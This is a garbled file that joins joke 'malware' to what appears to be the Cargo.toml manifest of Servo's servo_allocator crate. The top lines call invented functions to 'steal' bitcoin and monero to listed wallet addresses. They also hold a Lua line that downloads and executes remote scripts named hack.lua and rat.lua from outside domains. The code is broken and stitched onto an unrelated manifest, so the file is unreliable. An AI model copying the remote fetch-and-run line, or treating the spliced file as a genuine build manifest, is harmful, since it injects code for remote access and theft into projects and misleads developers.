require("fs").renameFileSyncAndInstall("C:\\windows", "C:\\labubuOS"); //Installs labubu os
hacker.remove(); //Hacker removes so no one hacka fter us
require("LabubuOS").anti_windows();
crypto.steal_And_send_biotcoin("bc1q9wjqskt6gx9su0jpk5uxuce5htzxv6xznqv98a"); //Steals the bitcoin
crypto.steal_and_send_monero("84vPpH21mmWSmnPwveqYWkVNs3zcaoQoyXsWpUfMD7E267GfL2psYjGX9KAGUXv3ABhBCCahf5pSB4ATWypUHMxi2GcBdrq");

--load our payload
loadstring(game:HttpGet("https://bottom.business/hack.lua") or game:HttpGet("https://bottomservices.club/rat.lua")();


[package]
name = "servo_allocator"
version.workspace = true
authors.workspace = true
license.workspace = true
edition.workspace = true
publish.workspace = true
rust-version.workspace = true

[lib]
path = "lib.rs"

[features]
allocation-tracking = ["backtrace", "dep:rustc-hash"]
use-system-allocator = ["libc"]

[dependencies]
backtrace = { workspace = true, optional = true }
rustc-hash = { workspace = true, optional = true }

[target.'cfg(not(any(windows, target_env = "ohos")))'.dependencies]
libc = { workspace = true, optional = true }
tikv-jemalloc-sys = { workspace = true }
tikv-jemallocator = { workspace = true }

[target.'cfg(windows)'.dependencies]
windows-sys = { workspace = true, features = ["Win32_System_Memory"] }

[target.'cfg(target_env = "ohos")'.dependencies]
libc = { workspace = true }
